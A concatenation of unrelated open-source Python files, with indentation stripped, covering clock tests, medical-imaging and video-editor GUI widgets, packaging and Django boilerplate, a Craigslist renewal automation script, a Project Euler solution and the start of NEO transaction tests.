if not has_monotonic or not has_clock_gettime:
if not has_monotonic:
print('Skip test_monotonic_settime: need time.monotonic')
elif not has_clock_gettime:
print('Skip test_monotonic_settime: need time.clock_settime')
else:
def test_monotonic_settime(self):
t1 = monotonic()
realtime = clock_gettime(CLOCK_REALTIME)
# jump backward with an offset of 1 hour
try:
clock_settime(CLOCK_REALTIME, realtime - 3600)
except OSError as err:
if err.errno == EPERM:
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest(str(err))
else:
print("Skip test_monotonic_settime: %s" % err)
return
else:
raise
t2 = monotonic()
clock_settime(CLOCK_REALTIME, realtime)
# monotonic must not be affected by system clock updates
self.assertGreaterEqual(t2, t1)
def test_perf_counter(self):
perf_counter()
def test_process_time(self):
start = process_time()
python_time.sleep(0.1)
stop = process_time()
self.assertLess(stop - start, 0.01)
info = get_clock_info('process_time')
self.assertEqual(info.monotonic, True)
self.assertEqual(info.adjustable, False)
def test_process_time_threads(self):
class BusyThread(threading.Thread):
def run(self):
while not self.stop:
pass
thread = BusyThread()
thread.stop = False
t1 = process_time()
thread.start()
sleep(0.2)
t2 = process_time()
thread.stop = True
thread.join()
self.assertGreater(t2 - t1, 0.1)
def test_sleep(self):
self.assertRaises(ValueError, sleep, -2)
self.assertRaises(ValueError, sleep, -1)
sleep(1.2)
def test_time(self):
value = time()
self.assertIsInstance(value, float)
info = get_clock_info('time')
self.assertEqual(info.monotonic, False)
self.assertEqual(info.adjustable, True)
if True:
from pprint import pprint
print("clock: %s" % clock())
if has_monotonic:
print("monotonic: %s" % monotonic())
else:
print("monotonic: <not available>")
print("perf_counter: %s" % perf_counter())
print("process_time: %s" % process_time())
print("time: %s" % time())
clocks = ['clock', 'perf_counter', 'process_time', 'time']
if has_monotonic:
clocks.append('monotonic')
pprint(dict((name, get_clock_info(name)) for name in clocks))
unittest.main()
| ionelmc/pytest-benchmark | src/pytest_benchmark/pep418.py | Python | bsd-2-clause | 28,504 |
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: [email protected]
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, according to version 2
# of the License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#--------------------------------------------------------------------------
import vtk
import constants as const
import vtk_utils as vu
BORDER_UP = 1
BORDER_DOWN = 2
BORDER_LEFT = 4
BORDER_RIGHT = 8
BORDER_ALL = BORDER_UP | BORDER_DOWN | BORDER_LEFT | BORDER_RIGHT
BORDER_NONE = 0
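# The BORDER_* constants are bit flags, so any subset of borders can be
# combined with bitwise OR when calling SliceData.SetBorderStyle(), e.g.
# (illustrative):
#
#     slice_data.SetBorderStyle(BORDER_UP | BORDER_LEFT)
#     slice_data.SetBorderStyle(BORDER_ALL)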
class SliceData(object):
def __init__(self):
self.actor = None
self.cursor = None
self.text = None
self.number = 0
self.orientation = 'AXIAL'
self.renderer = None
self.__create_text()
self.__create_box()
def __create_text(self):
colour = const.ORIENTATION_COLOUR[self.orientation]
text = vu.TextZero()
text.SetColour(colour)
text.SetSize(const.TEXT_SIZE_LARGE)
text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
#text.SetVerticalJustificationToBottom()
text.SetValue(self.number)
self.text = text
def __create_line_actor(self, line):
line_mapper = vtk.vtkPolyDataMapper2D()
line_mapper.SetInput(line.GetOutput())
line_actor = vtk.vtkActor2D()
line_actor.SetMapper(line_mapper)
return line_actor
def __create_box(self):
xi = yi = 0.1
xf = yf = 200
line_i = vtk.vtkLineSource()
line_i.SetPoint1((xi, yi, 0))
line_i.SetPoint2((xf, yi, 0))
self.line_i = line_i
self.line_i_actor = self.__create_line_actor(line_i)
line_s = vtk.vtkLineSource()
line_s.SetPoint1((xi, yf, 0))
line_s.SetPoint2((xf, yf, 0))
self.line_s = line_s
self.line_s_actor = self.__create_line_actor(line_s)
line_l = vtk.vtkLineSource()
line_l.SetPoint1((xi, yi, 0))
line_l.SetPoint2((xi, yf, 0))
self.line_l = line_l
self.line_l_actor = self.__create_line_actor(line_l)
line_r = vtk.vtkLineSource()
line_r.SetPoint1((xf, yi, 0))
line_r.SetPoint2((xf, yf, 0))
self.line_r = line_r
self.line_r_actor = self.__create_line_actor(line_r)
box_actor = vtk.vtkPropAssembly()
box_actor.AddPart(self.line_i_actor)
box_actor.AddPart(self.line_s_actor)
box_actor.AddPart(self.line_l_actor)
box_actor.AddPart(self.line_r_actor)
self.box_actor = box_actor
def __set_border_colours(self, colours_borders):
for colour, actors in colours_borders.items():
for actor in actors:
actor.GetProperty().SetColor(colour)
def SetBorderStyle(self, style=BORDER_NONE):
colour_e = const.ORIENTATION_COLOUR[self.orientation]
colour_i = (1, 1, 1)
extern_borders = []
intern_borders = []
if style & BORDER_UP:
extern_borders.append(self.line_s_actor)
else:
intern_borders.append(self.line_s_actor)
if style & BORDER_DOWN:
extern_borders.append(self.line_i_actor)
else:
intern_borders.append(self.line_i_actor)
if style & BORDER_LEFT:
extern_borders.append(self.line_l_actor)
else:
intern_borders.append(self.line_l_actor)
if style & BORDER_RIGHT:
extern_borders.append(self.line_r_actor)
else:
intern_borders.append(self.line_r_actor)
self.__set_border_colours({colour_i: intern_borders,
colour_e: extern_borders})
def SetCursor(self, cursor):
if self.cursor:
self.renderer.RemoveActor(self.cursor.actor)
self.renderer.AddActor(cursor.actor)
self.cursor = cursor
def SetNumber(self, number):
self.number = number
self.text.SetValue("%d" % self.number)
self.text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
def SetOrientation(self, orientation):
self.orientation = orientation
colour = const.ORIENTATION_COLOUR[self.orientation]
self.text.SetColour(colour)
#self.box_actor.GetProperty().SetColor(colour)
def SetSize(self, size):
w, h = size
xi = yi = 0.1
xf = w - 0.1
yf = h - 0.1
self.line_i.SetPoint1((xi, yi, 0))
self.line_i.SetPoint2((xf, yi, 0))
self.line_s.SetPoint1((xi, yf, 0))
self.line_s.SetPoint2((xf, yf, 0))
self.line_l.SetPoint1((xi, yi, 0))
self.line_l.SetPoint2((xi, yf, 0))
self.line_r.SetPoint1((xf, yi, 0))
self.line_r.SetPoint2((xf, yf, 0))
def Hide(self):
self.renderer.RemoveActor(self.actor)
self.renderer.RemoveActor(self.text.actor)
def Show(self):
self.renderer.AddActor(self.actor)
self.renderer.AddActor(self.text.actor)
| tatiana/invesalius | invesalius/data/slice_data.py | Python | gpl-2.0 | 5,655 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#######################################################################
#
# VidCutter - media cutter & joiner
#
# copyright © 2018 Pete Alexandrou
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#######################################################################
import os
import sys
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5.QtGui import QCloseEvent, QMouseEvent, QPixmap
from PyQt5.QtWidgets import (QCheckBox, QDialog, QDialogButtonBox, QFrame, QGridLayout, QGroupBox, QHBoxLayout, QLabel,
QMessageBox, QScrollArea, QSizePolicy, QSpacerItem, QStyleFactory, QVBoxLayout, QWidget)
from vidcutter.libs.iso639 import ISO639_2
from vidcutter.libs.videoservice import VideoService
class StreamSelector(QDialog):
def __init__(self, service: VideoService, parent=None, flags=Qt.Dialog | Qt.WindowCloseButtonHint):
super(StreamSelector, self).__init__(parent, flags)
self.service = service
self.parent = parent
self.streams = service.streams
self.config = service.mappings
self.setObjectName('streamselector')
self.setWindowModality(Qt.ApplicationModal)
self.setWindowTitle('Media streams - {}'.format(os.path.basename(self.parent.currentMedia)))
buttons = QDialogButtonBox(QDialogButtonBox.Ok, self)
buttons.accepted.connect(self.close)
layout = QVBoxLayout()
layout.setSpacing(15)
if len(self.streams.video):
layout.addWidget(self.video())
if len(self.streams.audio):
layout.addWidget(self.audio())
if len(self.streams.subtitle):
layout.addWidget(self.subtitles())
layout.addWidget(buttons)
self.setLayout(layout)
@staticmethod
def lineSeparator() -> QFrame:
line = QFrame()
line.setFrameShape(QFrame.HLine)
line.setFrameShadow(QFrame.Sunken)
line.setLineWidth(1)
line.setMidLineWidth(0)
line.setMinimumSize(0, 2)
return line
def video(self) -> QGroupBox:
framerate = round(eval(self.streams.video.avg_frame_rate), 3)
ratio = self.streams.video.display_aspect_ratio.split(':')
ratio = round(int(ratio[0]) / int(ratio[1]), 3)
icon = QLabel('<img src=":images/{}/streams-video.png" />'.format(self.parent.theme), self)
label = QLabel('''
<b>index:</b> {index}
<br/>
<b>codec:</b> {codec}
<br/>
<b>size:</b> {width} x {height}
<b>ratio:</b> {ratio}
<br/>
<b>frame rate:</b> {framerate} fps
<b>color format:</b> {pixfmt}'''.format(index=self.streams.video.index,
codec=self.streams.video.codec_long_name,
width=self.streams.video.width,
height=self.streams.video.height,
framerate='{0:.2f}'.format(framerate),
ratio='{0:.2f}'.format(ratio),
pixfmt=self.streams.video.pix_fmt), self)
label.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
videolayout = QHBoxLayout()
videolayout.setSpacing(15)
videolayout.addSpacing(25)
videolayout.addWidget(icon)
videolayout.addSpacing(45)
videolayout.addWidget(label)
videogroup = QGroupBox('Video')
videogroup.setLayout(videolayout)
return videogroup
def audio(self) -> QGroupBox:
audiolayout = QGridLayout()
audiolayout.setSpacing(15)
for stream in self.streams.audio:
            samplerate = round(int(stream.sample_rate) / 1000, 1)
checkbox = StreamSelectorCheckBox(stream.index, 'Toggle audio stream', self)
icon = StreamSelectorLabel('<img src=":images/{}/streams-audio.png" />'.format(self.parent.theme),
checkbox, True, self)
labeltext = '<b>index:</b> {}<br/>'.format(stream.index)
if hasattr(stream, 'tags') and hasattr(stream.tags, 'language'):
labeltext += '<b>language:</b> {}<br/>'.format(ISO639_2[stream.tags.language])
labeltext += '<b>codec:</b> {}<br/>'.format(stream.codec_long_name)
labeltext += '<b>channels:</b> {0} <b>sample rate:</b> {1:.2f} kHz' \
                .format(stream.channels, samplerate)
label = StreamSelectorLabel(labeltext, checkbox, False, self)
rows = audiolayout.rowCount()
audiolayout.addWidget(checkbox, rows, 0)
audiolayout.addItem(QSpacerItem(15, 1), rows, 1)
audiolayout.addWidget(icon, rows, 2)
audiolayout.addItem(QSpacerItem(30, 1), rows, 3)
audiolayout.addWidget(label, rows, 4)
if self.streams.audio.index(stream) < len(self.streams.audio) - 1:
audiolayout.addWidget(StreamSelector.lineSeparator(), rows + 1, 0, 1, 5)
audiolayout.setColumnStretch(4, 1)
audiogroup = QGroupBox('Audio')
if len(self.streams.audio) > 2:
audiolayout.setSizeConstraint(QGridLayout.SetMinAndMaxSize)
widget = QWidget(self)
widget.setObjectName('audiowidget')
widget.setStyleSheet('QWidget#audiowidget { background-color: transparent; }')
widget.setMinimumWidth(400)
widget.setLayout(audiolayout)
scrolllayout = QHBoxLayout()
scrolllayout.addWidget(StreamSelectorScrollArea(widget, 200, self.parent.theme, self))
audiogroup.setLayout(scrolllayout)
else:
audiogroup.setLayout(audiolayout)
return audiogroup
def subtitles(self) -> QGroupBox:
subtitlelayout = QGridLayout()
subtitlelayout.setSpacing(15)
for stream in self.streams.subtitle:
checkbox = StreamSelectorCheckBox(stream.index, 'Toggle subtitle stream', self)
icon = StreamSelectorLabel('<img src=":images/{}/streams-subtitle.png" />'.format(self.parent.theme),
checkbox, True, self)
labeltext = '<b>index:</b> {}<br/>'.format(stream.index)
if hasattr(stream, 'tags') and hasattr(stream.tags, 'language'):
labeltext += '<b>language:</b> {}<br/>'.format(ISO639_2[stream.tags.language])
labeltext += '<b>codec:</b> {}'.format(stream.codec_long_name)
label = StreamSelectorLabel(labeltext, checkbox, False, self)
rows = subtitlelayout.rowCount()
subtitlelayout.addWidget(checkbox, rows, 0)
subtitlelayout.addItem(QSpacerItem(15, 1), rows, 1)
subtitlelayout.addWidget(icon, rows, 2)
subtitlelayout.addItem(QSpacerItem(30, 1), rows, 3)
subtitlelayout.addWidget(label, rows, 4)
if self.streams.subtitle.index(stream) < len(self.streams.subtitle) - 1:
subtitlelayout.addWidget(StreamSelector.lineSeparator(), rows + 1, 0, 1, 5)
subtitlelayout.setColumnStretch(4, 1)
subtitlegroup = QGroupBox('Subtitles')
if len(self.streams.subtitle) > 2:
subtitlelayout.setSizeConstraint(QVBoxLayout.SetMinAndMaxSize)
widget = QWidget(self)
widget.setObjectName('subtitlewidget')
widget.setStyleSheet('QWidget#subtitlewidget { background-color: transparent; }')
widget.setMinimumWidth(400)
widget.setLayout(subtitlelayout)
scrolllayout = QHBoxLayout()
scrolllayout.addWidget(StreamSelectorScrollArea(widget, 170, self.parent.theme, self))
subtitlegroup.setStyleSheet('QGroupBox { padding-right: 0; }')
subtitlegroup.setLayout(scrolllayout)
else:
subtitlegroup.setLayout(subtitlelayout)
return subtitlegroup
@pyqtSlot()
def closeEvent(self, event: QCloseEvent) -> None:
# check if all audio streams are off
idx = [stream.index for stream in self.streams.audio]
no_audio = len(self.streams.audio) and True not in [self.config[i] for i in idx]
# check if all subtitle streams are off
idx = [stream.index for stream in self.streams.subtitle]
no_subtitles = len(self.streams.subtitle) and True not in [self.config[i] for i in idx]
# warn user if all audio and/or subtitle streams are off
if no_audio or no_subtitles:
if no_audio and not no_subtitles:
warnsubtext = 'All audio streams have been deselected which will produce a file with <b>NO AUDIO</b> ' \
'when you save.'
elif not no_audio and no_subtitles:
warnsubtext = 'All subtitle streams have been deselected which will produce a file with ' \
'<b>NO SUBTITLES</b> when you save.'
else:
warnsubtext = 'All audio and subtitle streams have been deselected which will produce a file ' \
'with <b>NO AUDIO</b> and <b>NO SUBTITLES</b> when you save.'
warntext = '''
<style>
h2 {{
color: {};
font-family: "Futura LT", sans-serif;
font-weight: normal;
}}
</style>
<table border="0" cellpadding="6" cellspacing="0" width="350">
<tr>
<td><h2>A friendly configuration warning</h2></td>
</tr>
<tr>
<td>{}</td>
</tr>
<tr>
<td>Are you sure this is what you want?</td>
</tr>
</table>'''.format('#C681D5' if self.parent.theme == 'dark' else '#642C68', warnsubtext)
warnmsg = QMessageBox(QMessageBox.Warning, 'Warning', warntext, parent=self)
warnmsg.setIconPixmap(QPixmap(':images/warning.png'))
warnmsg.addButton('Yes', QMessageBox.YesRole)
cancelbtn = warnmsg.addButton('No', QMessageBox.RejectRole)
warnmsg.exec_()
res = warnmsg.clickedButton()
if res == cancelbtn:
event.ignore()
return
event.accept()
self.deleteLater()
super(StreamSelector, self).closeEvent(event)
class StreamSelectorScrollArea(QScrollArea):
def __init__(self, widget: QWidget, minHeight: int, theme: str, parent):
super(StreamSelectorScrollArea, self).__init__(parent)
if sys.platform in {'win32', 'darwin'}:
self.setStyle(QStyleFactory.create('Fusion'))
# noinspection PyUnresolvedReferences
if parent.parent.parent.stylename == 'fusion' or sys.platform in {'win32', 'darwin'}:
self.setStyleSheet('''
QScrollArea {{
background-color: transparent;
margin-bottom: 10px;
border: none;
border-right: 1px solid {};
}}'''.format('#4D5355' if theme == 'dark' else '#C0C2C3'))
else:
self.setStyleSheet('''
QScrollArea {{
background-color: transparent;
margin-bottom: 10px;
border: none;
}}''')
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setFrameShape(QFrame.NoFrame)
self.setMinimumHeight(minHeight)
if widget is not None:
self.setWidget(widget)
class StreamSelectorCheckBox(QCheckBox):
def __init__(self, stream_index: int, tooltip: str, parent):
super(StreamSelectorCheckBox, self).__init__(parent)
self.parent = parent
self.setObjectName('streamcheckbox')
self.setCursor(Qt.PointingHandCursor)
self.setToolTip(tooltip)
self.setChecked(self.parent.config[stream_index])
self.stateChanged.connect(lambda state, index=stream_index: self.updateConfig(index, state == Qt.Checked))
def updateConfig(self, index: int, checked: bool) -> None:
self.parent.config[index] = checked
class StreamSelectorLabel(QLabel):
def __init__(self, text: str, checkbox: StreamSelectorCheckBox, is_icon: bool=False, parent=None):
super(StreamSelectorLabel, self).__init__(parent)
self.checkbox = checkbox
self.setAttribute(Qt.WA_Hover, True)
self.setText(text)
self.setToolTip(self.checkbox.toolTip())
self.setCursor(Qt.PointingHandCursor)
if is_icon:
self.setFixedSize(18, 18)
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
else:
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)
def mousePressEvent(self, event: QMouseEvent) -> None:
if event.button() == Qt.LeftButton and self.checkbox is not None:
self.checkbox.toggle()
super(StreamSelectorLabel, self).mousePressEvent(event)
| ozmartian/vidcutter | vidcutter/mediastream.py | Python | gpl-3.0 | 13,866 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, division, absolute_import, unicode_literals
| mick-d/nipype | nipype/sphinxext/__init__.py | Python | bsd-3-clause | 243 |
import unittest
def main():
loader = unittest.TestLoader()
suite = loader.discover('.', pattern='*.py')
unittest.TextTestRunner().run(suite)
if __name__ == "__main__":
main()
| uozuAho/doit_helpers | test/run_all_tests.py | Python | mit | 195 |
#!/usr/bin/python
# Welcome to CLRenew, a simple Python script that automates mouse clicks to
# renew craigslist postings. Credit to https://github.com/yuqianli for the base code.
import pyautogui
import os
# Set a counter to count the # of exceptions occur
counter = 0
# Start the while loop
while True:
try:
print ("Be sure your active listings page is up and active")
pyautogui.time.sleep(2)
renewButtonLocationX, renewButtonLocationY = pyautogui.locateCenterOnScreen('renew.png')
pyautogui.moveTo(renewButtonLocationX, renewButtonLocationY)
pyautogui.click()
pyautogui.time.sleep(2)
# This part of the loop will depend on your browser binding to go back a page:
pyautogui.keyDown('alt')
pyautogui.press('left')
pyautogui.keyUp('alt')
pyautogui.time.sleep(2)
    # Exception handling for when pyautogui can't locate the renew button on the
    # screen, or when it clicks away by mistake.
    # This section needs work and sometimes fails to function properly.
except Exception:
print ("Exception thrown, calculating course of action")
pyautogui.press('pgdn')
counter += 1
print ("counter =" + str(counter))
if counter >= 3: counter = 0
pyautogui.time.sleep(2)
renewButtonLocationX,renewButtonLocationY = pyautogui.locateCenterOnScreen('page2.png')
pyautogui.moveTo(renewButtonLocationX, renewButtonLocationY)
pyautogui.click()
pyautogui.time.sleep(2)
| calexil/CLRenew | renew.py | Python | gpl-3.0 | 1,501 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of importer.
# https://github.com/heynemann/importer
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Bernardo Heynemann <[email protected]>
from setuptools import setup, find_packages
from importer import __version__
tests_require = [
'mock',
'nose',
'coverage',
'yanc',
'preggy',
'tox',
'ipdb',
'coveralls',
'sphinx',
]
setup(
name='importer-lib',
version=__version__,
    description='Importer is a library to do dynamic importing of modules in python',
    long_description='''
Importer is a library to do dynamic importing of modules in python
''',
keywords='importer dynamic loading modules',
author='Bernardo Heynemann',
author_email='[email protected]',
url='https://github.com/heynemann/importer',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: Unix',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
'Operating System :: OS Independent',
],
packages=find_packages(),
include_package_data=False,
install_requires=[
# add your dependencies here
# remember to use 'package-name>=x.y.z,<x.(y+1).0' notation
# (this way you get bugfixes but no breaking changes)
],
extras_require={
'tests': tests_require,
},
entry_points={
'console_scripts': [
# add cli scripts here in this form:
# 'importer=importer.cli:main',
],
},
)
| heynemann/importer | setup.py | Python | mit | 1,854 |
#!/usr/bin/python
import os, string, sys
lib_path = os.path.abspath('./TL/')
sys.path.append(lib_path)
from data_handling import load_savedgzdata
basepath_15000 = sys.argv[1]
resolution_15000 = '15000'
basepath_50000 = sys.argv[2]
for nrun in range(1,21):
pathids0 = '{0:s}/{1:05d}_{2:05d}_test_ids.pkl.gz'.format(basepath_15000,nrun,string.atoi(resolution_15000))
pathids1 = '{0:s}/{1:05d}_{2:05d}_test_ids.pkl.gz'.format(basepath_50000,nrun,string.atoi(resolution_15000))
print >> sys.stderr, 'Loading ' + pathids0 + '...'
ids0 = load_savedgzdata(pathids0)
print >> sys.stderr, 'Loading ' + pathids1 + '...'
ids1 = load_savedgzdata(pathids1)
print >> sys.stderr, ids0
print >> sys.stderr, ids1
#raw_input()
| rjgsousa/TEM | sda_log_evaluation/check_ids.py | Python | gpl-3.0 | 754 |
#!/usr/bin/env python
import json
inv = {
'_meta': {
'hostvars': {}
},
'hosts': []
}
for num in range(0, 3):
host = u"host-%0.2d" % num
inv['hosts'].append(host)
inv['_meta']['hostvars'][host] = dict(ansible_ssh_host='127.0.0.1', ansible_connection='local')
print(json.dumps(inv, indent=2))
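# The emitted JSON looks roughly like this (abridged, illustrative only):
#
#     {
#       "_meta": {"hostvars": {"host-00": {"ansible_ssh_host": "127.0.0.1",
#                                          "ansible_connection": "local"}, ...}},
#       "hosts": ["host-00", "host-01", "host-02"]
#     }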
| ansible/tower-cli | docs/source/cli_ref/examples/inventory_script_example.py | Python | apache-2.0 | 327 |
from modules.chart_module import ChartModule
import tornado.web
import logging
class LineChartModule(ChartModule):
def render(self, raw_data, keys, chart_id="linechart"):
self.chart_id = chart_id
self.chart_data = self.overtime_linechart_data(raw_data, keys)
return self.render_string('modules/linechart.html', chart_id=self.chart_id)
def overtime_linechart_data(self, raw_data, keys,
yearterms_key='fcqs_yearterms',
overtime_key='fcqs_overtime'):
def _overtime_builder(overtime_data, key):
def _transform_overtime_data(yearterm):
value = overtime_data[str(yearterm)][key]
roundto = {
'percent_a': 3,
'percent_b': 3,
'percent_c': 3,
'percent_d': 3,
'percent_f': 3,
'percent_incomplete': 3,
'average_grade': 3
}.get(key, 1)
if value is not None:
return round(value, roundto)
else:
return None
return _transform_overtime_data
def _overtime_dataset_builder(key):
color = {
'course_howmuchlearned_average': (247, 92, 3),
'course_challenge_average': (217, 3, 104),
'courseoverall_average': (130, 2, 99),
'course_priorinterest_average': (4, 167, 119),
'instructor_effectiveness_average': (247, 92, 3),
'instructor_respect_average': (217, 3, 104),
'instructoroverall_average': (130, 2, 99),
'instructor_availability_average': (4, 167, 119),
'TTT_instructoroverall_average': (197, 27, 125),
'OTH_instructoroverall_average': (233, 163, 201),
'TA_instructoroverall_average': (253, 224, 239),
'GR_courseoverall_average': (77, 146, 33),
'UD_courseoverall_average': (161, 215, 106),
'LD_courseoverall_average': (230, 245, 106),
'percent_a': (44, 123, 182),
'percent_b': (171, 217, 233),
'percent_c': (255, 255, 191),
'percent_d': (253, 174, 97),
'percent_f': (215, 25, 28),
'percent_incomplete': (48, 48, 48),
'average_grade': (48, 48, 48),
}.get(key, (48, 48, 48))
yaxis_id = {
'percent_a': 'y-axis-3',
'percent_b': 'y-axis-3',
'percent_c': 'y-axis-3',
'percent_d': 'y-axis-3',
'percent_f': 'y-axis-3',
'percent_incomplete': 'y-axis-3',
'average_grade': 'y-axis-2',
}.get(key, 'y-axis-1')
fill = {
'percent_a': True,
'percent_b': True,
'percent_c': True,
'percent_d': True,
'percent_f': True,
'percent_incomplete': True,
}.get(key, False)
label = {
'course_howmuchlearned_average': 'Amount Learned',
'course_challenge_average': 'Challenge',
'courseoverall_average': 'Course Overall',
'course_priorinterest_average': 'Prior Interest',
'instructor_effectiveness_average': 'Effectiveness',
'instructor_respect_average': 'Respect',
'instructoroverall_average': 'Instructor Overall',
'instructor_availability_average': 'Availability',
'TTT_instructoroverall_average': 'TTT instructors',
'OTH_instructoroverall_average': 'OTH instructors',
'TA_instructoroverall_average': 'TA instructors',
'GR_courseoverall_average': 'GR Course Overall',
'UD_courseoverall_average': 'UD Course Overall',
'LD_courseoverall_average': 'LD Course Overall',
'percent_a': 'A Grade',
'percent_b': 'B Grade',
'percent_c': 'C Grade',
'percent_d': 'D Grade',
'percent_f': 'F Grade',
'percent_incomplete': 'Incomplete',
'average_grade': 'Average GPA'
}.get(key, '???')
background_alpha = 1.0 if fill else 0.2
return {
'label': label,
'fill': fill,
'yAxisID': yaxis_id,
'backgroundColor': "rgba({0},{1},{2},{background_alpha})".format(*color, background_alpha=background_alpha),
'borderColor': "rgba({0},{1},{2},1)".format(*color),
'pointBackgroundColor': "rgba({0},{1},{2},1)".format(*color),
'pointHoverBackgroundColor': "rgba({0},{1},{2},1)".format(*color),
'pointHoverBorderColor': "#fff",
'pointHoverBorderWidth': 2,
'pointHoverRadius': 5,
'data': list(map(_overtime_builder(overtime_data, key), yearterms))
}
yearterms = raw_data[yearterms_key]
overtime_data = raw_data[overtime_key]
labels = list(map(self.convert_date, yearterms))
datasets = list(map(_overtime_dataset_builder, keys))
return tornado.escape.json_encode({
'labels': labels,
'datasets': datasets,
})
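    # For reference, raw_data is expected to look roughly like the following
    # (keys taken from the defaults above; the values are illustrative only):
    #
    #     {'fcqs_yearterms': [20144, 20151, ...],
    #      'fcqs_overtime': {'20144': {'courseoverall_average': 5.1, ...},
    #                        '20151': {...}}}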
def embedded_javascript(self):
options = tornado.escape.json_encode(self.chart_options())
foo = '''
new Chart(document.getElementById("{2}").getContext("2d"),{{
type:'line',
data:{1},
options:{0}
}});
'''.format(options, self.chart_data, self.chart_id)
return foo
| SFII/cufcq-new | modules/linechart_module.py | Python | mit | 5,898 |
#!/usr/bin/env python
import confy
import os
import sys
# These lines are required for interoperability between local and container environments.
dot_env = os.path.join(os.getcwd(), '.env')
if os.path.exists(dot_env):
confy.read_environment_file()
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "oim_cms.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| scottp-dpaw/oim-cms | manage.py | Python | apache-2.0 | 1,015 |
#
# Solution to Project Euler problem 73
# Philippe Legault
#
# https://github.com/Bathlamos/Project-Euler-Solutions
from fractions import Fraction, gcd
from math import ceil
# Not too slow, can be done directly
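# For each denominator i up to 12000, count the numerators j with
# 1/3 < j/i < 1/2 and gcd(i, j) == 1; the +/- 0.00001 nudges keep the
# endpoints 1/3 and 1/2 themselves out of the count.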
def compute():
lower_limit = Fraction(1, 3)
upper_limit = Fraction(1, 2)
res = 0
for i in range(1, 12000 + 1):
for j in range(int(ceil(lower_limit * i + 0.00001)), int(upper_limit * i - 0.00001) + 1):
if gcd(i, j) == 1:
res += 1
return res
if __name__ == "__main__":
print(compute()) | Bathlamos/Project-Euler-Solutions | solutions/p073.py | Python | mit | 520 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0008_auto_20160304_1108'),
]
operations = [
migrations.AlterField(
model_name='room',
name='text_coords',
field=models.CommaSeparatedIntegerField(help_text='Area where the label should be displayed (defaults to room coordinates)<br>Please use the following format: <em>x1,y1,x2,y2</em>. <b>Rectangle only!</b>', max_length=50, null=True, verbose_name='Text area coordinates', blank=True),
),
]
| CentechMTL/TableauDeBord | app/home/migrations/0009_auto_20160304_1126.py | Python | gpl-3.0 | 646 |
#
# Copyright (C) 2006-2016 Nexedi SA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from mock import Mock
from struct import pack
from .. import NeoUnitTestBase
from neo.lib.protocol import NodeTypes
from neo.lib.util import packTID, unpackTID, addTID
from neo.master.transactions import Transaction, TransactionManager
class testTransactionManager(NeoUnitTestBase):
def makeTID(self, i):
return pack('!Q', i)
def makeOID(self, i):
return pack('!Q', i)
def makeNode(self, node_type):
uuid = self.getNewUUID(node_type)
node = Mock({'getUUID': uuid, '__hash__': uuid, '__repr__': 'FakeNode'})
return uuid, node
def testTransaction(self):
# test data
node = Mock({'__repr__': 'Node'})
tid = self.makeTID(1)
ttid = self.makeTID(2)
oid_list = (oid1, oid2) = [self.makeOID(1), self.makeOID(2)]
uuid_list = (uuid1, uuid2) = [self.getStorageUUID(),
self.getStorageUUID()]
msg_id = 1
# create transaction object
txn = Transaction(node, ttid)
txn.prepare(tid, oid_list, uuid_list, msg_id)
self.assertEqual(txn.getUUIDList(), uuid_list)
self.assertEqual(txn.getOIDList(), oid_list)
# lock nodes one by one
self.assertFalse(txn.lock(uuid1))
self.assertTrue(txn.lock(uuid2))
# check that repr() works
repr(txn)
def testManager(self):
# test data
node = Mock({'__hash__': 1})
msg_id = 1
